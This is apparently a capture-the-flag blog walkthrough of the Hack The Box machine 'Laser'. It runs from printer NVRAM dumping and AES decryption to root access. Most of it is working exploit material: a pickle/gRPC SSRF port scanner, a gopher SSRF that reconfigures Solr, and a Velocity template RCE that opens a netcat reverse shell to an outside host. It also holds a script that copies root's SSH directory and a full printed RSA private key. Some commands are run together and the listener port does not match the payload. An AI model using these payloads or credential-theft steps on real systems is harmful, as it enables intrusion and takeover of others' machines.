Machine IP : 10.10.10.201
First start with Nmap:
rajsec@kali:~/HTB/laser$ nmap -sC -sV --min-rate=5000 10.10.10.201
Nmap scan report for 10.10.10.201
Host is up (0.12s latency).
Not shown: 959 filtered ports, 40 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Seems only port 22 is open
Let's use PortScanner to find open ports
git clone https://github.com/varshithrajbasa/Port-Scanner.git
rajsec@kali:~/Desktop/Port-Scanner$ ./portscanner.py -i 10.10.10.201
____________________
< Port Scanner v.1.1.2 >
--------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
--------------------------------------------------
Scanning target 10.10.10.201
Scan Started: 2020-11-05 01:26:41.033400
--------------------------------------------------
Port 22 is open
Port 9000 is open
Port 9100 is open
--------------------------------------------------
Scan Ended: 2020-11-05 01:26:42.612937
--------------------------------------------------
After some research I found HP jetdirect is a tcp/ip printer server and found the following enumeration tool:
PRET tool
git clone https://github.com/RUB-NDS/PRET.git
rajsec@kali:~/HTB/laser/PRET$ ./pret.py 10.10.10.201 pjl
Please install the 'colorama' module for color support.
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.40
|=== |----| || by Jens Mueller <jens.a.mueller@rub.de>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 pentesting tool that made
|-||/_____\||-. | |´ dumpster diving obsolete‥ 」
|_||=L==H==||_|__|/
(ASCII art by
Jan Foerster)
Connection to 10.10.10.201 established
Device: LaserCorp LaserJet 4ML
Welcome to the pret shell. Type help or ? to list commands.
10.10.10.201:/> ls
d - pjl
10.10.10.201:/>
I downloaded the file to decrypt it
10.10.10.201:/pjl/jobs> nvram dump Writing copy to 10.10.10.201 ......................................................................................................................................................................................
.................................................................................................................................................................................
.................................................................................................................................................................................
..................................................................k...e....y.....13vu94r6..643rv19u
10.10.10.201:/pjl/jobs>
I converted it into Base64
sed -e "s#'##g" queued | cut -c2- > queued.b64
Now our file is converted to base64
rajsec@kali:~/HTB/laser/PRET$ sed -e "s#'##g" 10.10.10.201 | cut -c2- > queued.b64 rajsec@kali:~/HTB/laser/PRET$ ls 10.10.10.201 codebook.py db discovery.pyc fuzzer.pyc img mibs operators.pyc pcl.pyc postscript.py printer.py README.md capabilities.py codebook.pyc DISCLAIMER.md fonts helper.py LICENSE.md nvram overlays pjl.py postscript.pyc printer.pyc testpages capabilities.pyc console.py discovery.py fuzzer.py helper.pyc lpd operators.py pcl.py pjl.pyc pret.py queued.b64
decode.py file
import base64
with open("queued.b64","r") as rajsec:
rajsec_content = rajsec.read()
b85dec_content = base64.b85decode(rajsec_content)
with open("rajsec.raw","wb") as rajsec_jpg:
rajsec_jpg.write(b85dec_content)
AES decryption file aesdec.py
#!/bin/python3
import io, sys, base64
from Crypto.Cipher import AES
with io.open('rajsec.raw', 'rb') as fp:
c = fp.read()[8:]
iv, ct = c[:16], c[16:]
cipher = AES.new('13vu94r6643rv19u', AES.MODE_CBC, iv)
z = cipher.decrypt(ct)
sys.stdout.buffer.write(z)
Let's run it and we will get a pdf file
rajsec@kali:~/HTB/laser/PRET$ python aesdec.py > rajsec.pdf
Some important are
...
return service_pb2.Data(feed='Pushing feeds')
...
Here is how a sample feed information looks like.
{
"version": "v1.0",
"title": "Printer Feed",
"home_page_url": "http://printer.laserinternal.htb/",
"feed_url": "http://printer.laserinternal.htb/feeds.json",
"items": [
{
"id": "2",
"content_text": "Queue jobs"
},
{
"id": "1",
"content_text": "Failed items"
}
]
}
Port 9000 needs content, Data and Service print
Let's create rajsec.proto
syntax = "proto3";
message Content {
string data = 1;
}
message Data {
float feed = 1;
}
service Print {
rpc Feed(Content) returns (Data) {}
}
Now install some dependencies using pip3 tools
pip3 install grpcio pip3 install grpcio-tools rajsec@kali:~/HTB/laser$ python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. rajsec.proto
Now we have a few file and can start create our client
rajsec@kali:~/HTB/laser$ ls rajsec_pb2_grpc.py rajsec_pb2.py rajsec.proto
Let's scan it scanner.py
import sys, pickle, base64
import grpc, rajsec_pb2, rajsec_pb2_grpc
for port in range(1, 65536):
payload = '{"feed_url":"http://localhost:' + str(port) + '"}'
payload = base64.b64encode(pickle.dumps(payload))
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = rajsec_pb2_grpc.PrintStub(channel)
content = rajsec_pb2.Content(data=payload)
try:
response = stub.Feed(content, timeout=10)
print(port, response)
except Exception as ex:
if 'Connection refused' in ex.details():
continue
print(port)
Let's run scanner.py
rajsec@kali:~/HTB/laser$ python3 scanner.py 22 7983 8983 feed: "Pushing feeds" 9000 9100
Port 8983 has pushing feeds
now use two scripts to get shell
exp1.py
import base64
import pickle
import os
data0 = '{"feed_url":"gopher://localhost:8983/0POST%20%2Fsolr%2Fstaging%2Fconfig%20HTTP%2F1.1%0AHost%3A%20localhost%3A8983%0AContent-Type%3A%20application%2Fjson%0AContent-Length%3A%20259%0A%0A%7B%0A%20%20%22update-queryresponsewriter%22%3A%20%7B%0A%20%20%20%20%22startup%22%3A%20%22lazy%22%2C%0A%20%20%20%20%22name%22%3A%20%22velocity%22%2C%0A%20%20%20%20%22class%22%3A%20%22solr.VelocityResponseWriter%22%2C%0A%20%20%20%20%22template.base.dir%22%3A%20%22%22%2C%0A%20%20%20%20%22solr.resource.loader.enabled%22%3A%20%22true%22%2C%0A%20%20%20%20%22params.resource.loader.enabled%22%3A%20%22true%22%0A%20%20%7D%0A%7D"}'
data = base64.b64encode(pickle.dumps(data0))
os.system("/home/rajsec/HTB/laser/grpcurl -plaintext -d '{\"data\":\"%s\"}' -proto rajsec.proto 10.10.10.201:9000 Print.Feed" % data.decode())
exp2.py
import base64
import pickle
import os
import sys
data1 = '{"feed_url":"http://localhost:8983/solr/staging/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nc%2010.10.10.6%204444%20-e%20%2Fbin%2Fbash%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"}'
data = base64.b64encode(pickle.dumps(data1))
os.system("/home/rajsec/HTB/laser/grpcurl -plaintext -d '{\"data\":\"%s\"}' -proto rajsec.proto 10.10.10.201:9000 Print.Feed" % data.decode())
Now start listener
rajsec@kali:~/HTB/laser$ nc -nvlp 5678 listening on [any] 5678 ... connect to [10.10.**.**] from printer.laserinternal.htb [10.10.10.201] 52148 $ whoami solr $ cd /home/solr /home/solr $ wc -c user.txt 33 user.txt
After running pspy64 I got docker password
c413d115b3d87664499624e7826d8c5a
Get socat into docker and disable ssh
service ssh stop chmod +x socat ./socat TCP-LISTEN:22,fork,reuseaddr TCP:172.18.0.1:22
Let's create bash file
echo '#!/bin/sh\nmkdir -p /tmp/rajsec;cp -R /root/.ssh /tmp/rajsec; chown -R solr:solr /tmp/rajsec' > /tmp/rajsec.sh chmod a+x /tmp/rajsec.sh
Now we got key
solr@laser:/tmp/rajsec/.ssh$ ls authorized_keys id_rsa id_rsa.pub solr@laser:/tmp/rajsec/.ssh$ cat id_rsa -----BEGIN RSA PRIVATE KEY----- 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 -----END RSA PRIVATE KEY----- solr@laser:/tmp/rajsec/.ssh$
Now save it as key them change permissions
rajsec@kali:~/HTB/laser$ chmod 600 key rajsec@kali:~/HTB/laser$ ssh -i key root@10.10.10.201 load pubkey "key": invalid format Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed 04 Nov 2020 03:33:38 PM UTC System load: 0.12 Usage of /: 42.5% of 19.56GB Memory usage: 65% Swap usage: 0% Processes: 235 Users logged in: 0 IPv4 address for br-3ae8661b394c: 172.18.0.1 IPv4 address for docker0: 172.17.0.1 IPv4 address for ens160: 10.10.10.201 IPv6 address for ens160: dead:beef::250:56ff:feb9:77c8 73 updates can be installed immediately. 0 of these updates are security updates. To see these additional updates run: apt list --upgradable Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: *** *** **--**-*-*-* from 10.10.**.** root@laser:~# whoami && id root uid=0(root) gid=0(root) groups=0(root) root@laser:~# hostname laser root@laser:~# wc -c root.txt 33 root.txt root@laser:~#
That's it we rooted
Thanks for Reading
1 Comments
Awesome but dump doesn't work so I use "nvram dump" command to get the queued file, but no idea where it is stored..
ReplyDeleteCan you tell me where the queued file is located??